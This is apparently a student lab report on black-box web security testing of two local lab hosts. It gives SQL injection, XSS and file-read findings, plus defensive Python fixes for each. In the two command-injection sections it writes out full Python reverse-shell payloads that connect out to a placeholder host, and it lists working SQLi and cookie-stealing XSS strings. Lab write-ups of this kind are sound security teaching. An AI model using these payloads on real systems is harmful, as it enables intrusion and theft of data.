# NCS: Lab 3 - Web Security
## Student names:
* Daniyar Cherekbashev
* Ali Mansour
* Gleb Statkevich
## Task - black box testing
## innost5/innowva host
### SQL injection in the login page
A simple payload such as `1' or 1=1;--` logs us in. The session is admin's, probably because the query matches every row and the application takes the first record returned, and admin has uid 1.

### Self-xss in the search page
A simple payload such as `"><img src onerror=alert(document.cookie)>` leads to self-XSS (it fires only in the browser of the user who submitted the search).

### Arbitrary file read
The `read` endpoint returns the contents of any file whose name is supplied.

With this we can even extract the source code of the server.

The source shows the database name, so we can extract the database too.
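The root cause is that the `read` endpoint joins a client-supplied name onto a directory and opens whatever results. The following is an added example (not the lab server's code) of the containment check such an endpoint needs: resolve the requested name against a fixed base directory and refuse anything that does not land strictly inside it. The base directory, file names and file contents in `demo()` are constructed in a temporary directory for the demonstration.

```python
import os
import tempfile


def resolve_under(base_dir, requested_name):
    """Return the real path of requested_name inside base_dir, or None if it escapes.

    os.path.join discards base_dir when requested_name is absolute, and realpath
    collapses "..", so "/etc/passwd" and "../x" both end up outside base_dir and
    are caught by the common-path comparison rather than by string filtering.
    """
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested_name))
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def safe_read(base_dir, requested_name):
    """Serve a regular file from base_dir; anything else is refused."""
    path = resolve_under(base_dir, requested_name)
    if path is None or not os.path.isfile(path):
        raise PermissionError(f"refusing to serve {requested_name!r}")
    with open(path, "rb") as f:
        return f.read()


def demo():
    """Constructed layout: a served wallpapers dir and a sensitive file beside it."""
    with tempfile.TemporaryDirectory() as root:
        wallpapers = os.path.join(root, "wallpapers")
        os.mkdir(wallpapers)
        with open(os.path.join(wallpapers, "car.jpg"), "wb") as f:
            f.write(b"\xff\xd8\xff fake jpeg")
        # stands in for the server source / database that the lab endpoint leaked
        with open(os.path.join(root, "app.py"), "w") as f:
            f.write("DB_NAME = 'secret'\n")

        served = safe_read(wallpapers, "car.jpg")
        rejected = []
        for name in ["../app.py", "/etc/passwd", "sub/../../app.py", ".", ""]:
            try:
                safe_read(wallpapers, name)
            except PermissionError:
                rejected.append(name)
        return served, rejected


if __name__ == "__main__":
    content, refused = demo()
    print("served:", content)
    print("refused:", refused)
```

A stronger design avoids taking file names from the client at all: store an id-to-filename mapping server-side and let the endpoint accept only the id.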

### Arbitrary file upload
The `upload` endpoint accepts any file, although by design it was supposed to accept only car wallpapers.

Confirming with the arbitrary file read that the upload succeeded:
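An upload endpoint meant for wallpapers should verify that what arrives is a wallpaper and should never reuse the client's file name on disk. The following is an added example (not the lab server's code) that checks the extension against an allow-list, checks the file signature against that extension, bounds the size, and returns a random server-chosen storage name. The size limit and the sample files in `demo()` are constructed assumptions.

```python
import os
import secrets

# Signature prefixes for the only formats a wallpaper upload should accept.
ALLOWED_TYPES = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
}
MAX_BYTES = 5 * 1024 * 1024  # assumption: a 5 MiB wallpaper limit


class UploadRejected(ValueError):
    pass


def validate_wallpaper(client_filename, data):
    """Check extension, size and signature; return the storage name to use.

    The client's name is consulted only for its extension. It is never written
    to disk, so traversal sequences or a script extension in it have no effect;
    the stored name is random and carries the verified extension.
    """
    ext = os.path.splitext(client_filename)[1].lower()
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension {ext!r} not allowed")
    if not data or len(data) > MAX_BYTES:
        raise UploadRejected("bad size")
    if not any(data.startswith(sig) for sig in ALLOWED_TYPES[ext]):
        raise UploadRejected("content does not match declared type")
    return secrets.token_hex(16) + ext


def demo():
    """Constructed uploads: two real-looking images, two impostors, one traversal name."""
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
    jpg = b"\xff\xd8\xff\xe0" + b"\x00" * 32
    text = b"<html>not an image</html>"
    cases = {
        "car.png": png,
        "car.jpg": jpg,
        "notes.txt": text,          # disallowed extension
        "car2.png": text,           # allowed extension, wrong signature
        "../../escape.jpg": jpg,    # traversal in the client-supplied name
    }
    accepted, rejected = {}, {}
    for name, data in cases.items():
        try:
            accepted[name] = validate_wallpaper(name, data)
        except UploadRejected as e:
            rejected[name] = str(e)
    return accepted, rejected


if __name__ == "__main__":
    ok, bad = demo()
    print("accepted:", ok)
    print("rejected:", bad)
```

The returned name is meant to be joined onto one fixed upload directory that the web server serves as static content only, never executes, and that the `read` endpoint above cannot be pointed outside of.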

### RCE in the Server Status page
After examining the retrieved source code, we can see that RCE is also trivially achievable in the server status page with a command such as `google.com || python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'`:



Doing this led to a DoS.
Combined with the arbitrary file upload, it also makes running specific things on the host easier.

## innost5/innowva host
### Stored XSS in the Guestbook and Picture comments
The comment fields on the guestbook page and the picture view are not properly sanitized, leading to stored XSS (with a simple payload such as `"><img src onerror=alert(123)>"`), which opens a potential attack vector for stealing sensitive information such as cookies.


### SQL Injection in similar.php
Register a user with a simple SQL injection such as `1' or 1=1 -- ` in the first name field, then visit the `http://localhost:8090/users/similar.php` endpoint.

The first name was not properly sanitized and the injected SQL was executed, displaying all registered users.

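Both SQL injection findings on this page have the same fix. The login page on the first host concatenates the username into its query (first-order injection), while `similar.php` trusts a first name that was stored earlier and pastes it into a later query (second-order injection). The following is an added example, not code from either lab host, using an in-memory SQLite database whose schema and rows are constructed; it reproduces both behaviours with the page's payloads and shows that binding parameters defeats both, including the stored case.

```python
import sqlite3

LOGIN_PAYLOAD = "1' or 1=1;--"     # from the login-page finding
NAME_PAYLOAD = "1' or 1=1 -- "     # from the similar.php finding


def make_db():
    """Constructed schema: only the observed behaviour is modelled
    (first matching row wins; admin has uid 1). Passwords are stored
    in clear text here purely to keep the injection demonstration short."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(
            uid INTEGER PRIMARY KEY,
            username TEXT, password TEXT, first_name TEXT);
        INSERT INTO users VALUES (1, 'admin', 'adminpass', 'Ann');
        INSERT INTO users VALUES (2, 'bob',   'bobpass',   'Bob');
    """)
    return db


def login_vulnerable(db, username, password):
    """Builds the WHERE clause by string formatting, as the login page evidently does."""
    sql = (f"SELECT uid, username FROM users "
           f"WHERE username='{username}' AND password='{password}'")
    return db.execute(sql).fetchone()          # first matching row wins


def login_fixed(db, username, password):
    """Same query with bound parameters: the quote in the payload is just data."""
    sql = "SELECT uid, username FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone()


def register(db, username, password, first_name):
    """Registration itself is parameterised, so the payload is stored verbatim."""
    cur = db.execute(
        "INSERT INTO users(username, password, first_name) VALUES (?, ?, ?)",
        (username, password, first_name))
    return cur.lastrowid


def similar_vulnerable(db, uid):
    """Second-order injection: a value read back from the database is trusted
    and pasted into a new query, which is what similar.php appears to do."""
    first = db.execute("SELECT first_name FROM users WHERE uid=?", (uid,)).fetchone()[0]
    sql = f"SELECT username FROM users WHERE first_name='{first}' AND uid<>{uid}"
    return db.execute(sql).fetchall()


def similar_fixed(db, uid):
    """Data coming back out of the database is bound exactly like data coming in."""
    first = db.execute("SELECT first_name FROM users WHERE uid=?", (uid,)).fetchone()[0]
    sql = "SELECT username FROM users WHERE first_name=? AND uid<>?"
    return db.execute(sql, (first, uid)).fetchall()


def demo():
    db = make_db()
    results = {
        "vuln_login": login_vulnerable(db, LOGIN_PAYLOAD, "anything"),
        "fixed_login": login_fixed(db, LOGIN_PAYLOAD, "anything"),
    }
    uid = register(db, "mallory", "pw", NAME_PAYLOAD)
    results["vuln_similar"] = similar_vulnerable(db, uid)
    results["fixed_similar"] = similar_fixed(db, uid)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The point of the second half is that "sanitize on input" is not a fix: the stored first name is legitimate data and must stay as typed, so the query that later uses it has to bind it rather than trust it.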
### Weak admin password
Open the `http://localhost:8090/admin/index.php?page=login` page (linked from the footer); the simple combination `admin:admin` worked, granting admin access.

### Directory Listing on users, images, pictures endpoints
Each of these endpoints lists every file in its directory. This is an information disclosure, as those files should not be visible to everyone.

### RCE on passcheck.php
After entering some simple password, we can see that it is passed straight into a shell command.

Here it is inserted into `grep ^PASSWORD$`, so we need to find a way to create a reverse shell from this.
If `grep` is given only a pattern, it keeps scanning its standard input for that pattern, so the request just hangs (a DoS) and nothing else happens. We therefore have to point grep at some valid file and append our shell after it.
Working payload: ` /etc/passwd && python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("IP",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("bash")' # `. We insert a space before the readable file `/etc/passwd`, so the command becomes `grep ^ /etc/passwd`; then `&&` chains our reverse shell, and the trailing ` # ` comments out the rest of the original command so the remaining part is discarded.
So we successfully get the shell!
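The server status page on the first host and `passcheck.php` here share one defect: user input is spliced into a command string that a shell parses, so `||`, `&&` and `#` change the command instead of being data. The following is an added example, not code from either host, showing the two fixes a defender would apply: for the status check, validate the input as a hostname and run the program with an argument list and no shell; for the password check, drop the external `grep` entirely and compare against a salted PBKDF2 hash in constant time (a swapped-in technique, not what the lab app does). The payload strings are shortened versions of the page's chaining pattern with a harmless trailing command.

```python
import hashlib
import hmac
import re
import secrets
import subprocess

STATUS_PAYLOAD = "google.com || id"       # same chaining shape as the page's payload
PASSCHECK_PAYLOAD = " /etc/passwd && id #"

# RFC 1123-style hostname: labels of letters, digits and inner hyphens, dot separated.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*$", re.IGNORECASE)


def validate_host(host):
    """Allow-list check: spaces, shell metacharacters and leading '-' all fail."""
    return bool(HOSTNAME_RE.match(host))


def build_ping_argv(host):
    """Argument vector for the status check. Each element is passed to execve
    as-is; no shell ever sees it, so there is nothing for '||' to chain onto."""
    if not validate_host(host):
        raise ValueError(f"invalid hostname {host!r}")
    return ["ping", "-c", "1", "-W", "2", host]


def server_status(host):
    """Runs the check (not exercised by the test; needs a ping binary and network)."""
    result = subprocess.run(build_ping_argv(host), capture_output=True,
                            text=True, timeout=10)
    return result.returncode == 0


PBKDF2_ROUNDS = 200_000   # assumption: a reasonable cost for this demonstration


def hash_password(password, salt=None):
    """Store salt || PBKDF2-HMAC-SHA256(password); nothing here touches a shell."""
    salt = salt or secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt + digest


def check_password(candidate, stored):
    """The page's grep call was effectively a string equality test run through
    the shell; this is the same test without the shell and without timing leaks."""
    salt, digest = stored[:16], stored[16:]
    computed = hashlib.pbkdf2_hmac("sha256", candidate.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(computed, digest)


if __name__ == "__main__":
    print(build_ping_argv("google.com"))
    try:
        build_ping_argv(STATUS_PAYLOAD)
    except ValueError as e:
        print("rejected:", e)
    stored = hash_password("correct horse")
    print(check_password("correct horse", stored), check_password(PASSCHECK_PAYLOAD, stored))
```

If an external program genuinely must be called with user data, the argument-list form plus validation is the whole fix; quoting or blacklisting characters for `shell=True` is not equivalent and is where the `#`-comment trick in the payload above comes from.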

### Arbitrary content and script injection at test.php
A Nikto scan revealed a hidden file `http://localhost:8090/test.php` in the service.

After getting a reverse shell through the aforementioned RCE, we can also view the source code of this file.

As the source code shows, arbitrary JavaScript can be injected simply through the `script` parameter.

### Completely flawed cart page
After opening the calendar page from the home page and scrolling through 3 days, we get the coupon `SUPERYOU21`.

If we try to apply this coupon several times, the cart simply accepts it each time.

Now the item costs much less.

And if we are still too greedy to pay even this much, we can just grab the high-quality download link `http://localhost:8090/pictures/high_quality.php?picid=14&key=MzM4OTU3MA%3D%3D` that was provided to us before paying and cancel the payment.

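Both cart problems are server-side state problems: the discount is applied by repeatedly subtracting from a running total, and the download key is handed out before the payment is confirmed. The following is an added example (not the lab shop's code) of how an order model avoids both: a coupon is a property of the order that can be set once, the total is recomputed from the list price, and a download key is an HMAC over the paid order that is only issued after payment. The coupon's percentage, the server secret and the price are constructed assumptions; only the coupon code and picture id come from the report.

```python
import base64
import hashlib
import hmac
import secrets

SERVER_SECRET = secrets.token_bytes(32)   # assumption: per-deployment secret

# Constructed coupon table: SUPERYOU21 is the code from the report; 20% is assumed.
COUPONS = {"SUPERYOU21": 20}


class Order:
    def __init__(self, picid, price_cents):
        self.order_id = secrets.token_hex(8)
        self.picid = picid
        self.price_cents = price_cents   # list price, never mutated by coupons
        self.coupon = None
        self.paid = False


def apply_coupon(order, code):
    """At most one coupon per order; a second application is refused, not stacked."""
    if code not in COUPONS or order.coupon is not None:
        return False
    order.coupon = code
    return True


def total_cents(order):
    """Recomputed from the list price, so re-applying can never compound."""
    return order.price_cents * (100 - COUPONS.get(order.coupon, 0)) // 100


def confirm_payment(order, gateway_confirmed):
    """gateway_confirmed is assumed to come from a server-to-server check with
    the payment provider, not from the client's redirect back to the shop."""
    order.paid = bool(gateway_confirmed)


def _key_material(order_id, picid, secret):
    return hmac.new(secret, f"{order_id}:{picid}".encode(), hashlib.sha256).digest()


def issue_download_key(order, secret=SERVER_SECRET):
    """Only a paid order gets a key, and the key is a MAC over the order identity
    rather than an encoding the client could produce itself."""
    if not order.paid:
        raise PermissionError("payment not confirmed")
    return base64.urlsafe_b64encode(
        _key_material(order.order_id, order.picid, secret)).decode()


def verify_download_key(order_id, picid, key, secret=SERVER_SECRET):
    """high_quality.php-style check: recompute and compare in constant time."""
    try:
        given = base64.urlsafe_b64decode(key.encode())
    except ValueError:          # binascii.Error is a ValueError subclass
        return False
    return hmac.compare_digest(_key_material(order_id, picid, secret), given)


if __name__ == "__main__":
    order = Order(picid=14, price_cents=1000)
    print(apply_coupon(order, "SUPERYOU21"), apply_coupon(order, "SUPERYOU21"))
    print("total:", total_cents(order))
    confirm_payment(order, True)
    key = issue_download_key(order)
    print("valid:", verify_download_key(order.order_id, 14, key))
```

The download check also needs to be done by the endpoint that serves the file, not by the page that renders the link; a link the browser can see before payment is by definition usable before payment.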
### Reflected XSS in search and piccheck
The simple payload `"><img src onerror=alert(document.cookie)>` works on both endpoints:
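Every XSS finding on this page (the self-XSS in the search page, the stored XSS in guestbook and picture comments, the `script` parameter of `test.php`, and the reflected XSS here) comes from writing user input into HTML without encoding it for the context it lands in. The following is an added example, not code from either lab host, showing the page's own payload rendered through HTML escaping in element content and in an attribute value, plus the cookie attribute that keeps `document.cookie` from exposing the session even if an injection slips through. The template fragments and cookie name are constructed.

```python
import html

PAYLOAD = '"><img src onerror=alert(document.cookie)>'


def render_comment(text):
    """Guestbook / picture comment placed in element content.
    html.escape turns < > & into entities, so the browser sees text, not a tag."""
    return f'<p class="comment">{html.escape(text)}</p>'


def render_search_form(query):
    """Search term echoed back inside a quoted attribute. quote=True (the default)
    also escapes the double quote, so the payload cannot close the attribute and
    start a new tag, which is exactly what its leading '">' tries to do."""
    return f'<input name="q" value="{html.escape(query, quote=True)}">'


def session_cookie_header(value):
    """HttpOnly removes the cookie from document.cookie; Secure and SameSite
    limit where it is sent. None of this replaces escaping, it limits the damage."""
    return f"Set-Cookie: session={value}; HttpOnly; Secure; SameSite=Lax; Path=/"


def is_inert(rendered):
    """Crude check used by the demo: no raw tag start and no attribute break-out."""
    return "<img" not in rendered and '">' + "<" not in rendered


def demo():
    return {
        "comment": render_comment(PAYLOAD),
        "search": render_search_form(PAYLOAD),
        "cookie": session_cookie_header("constructed-session-id"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Escaping is context-specific: the two render functions above are safe because the input lands in element text or in a quoted attribute. Input placed inside a `<script>` block or an inline event handler, as `test.php` apparently does with its `script` parameter, cannot be made safe by HTML escaping at all; the fix there is to not put the parameter in script context.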

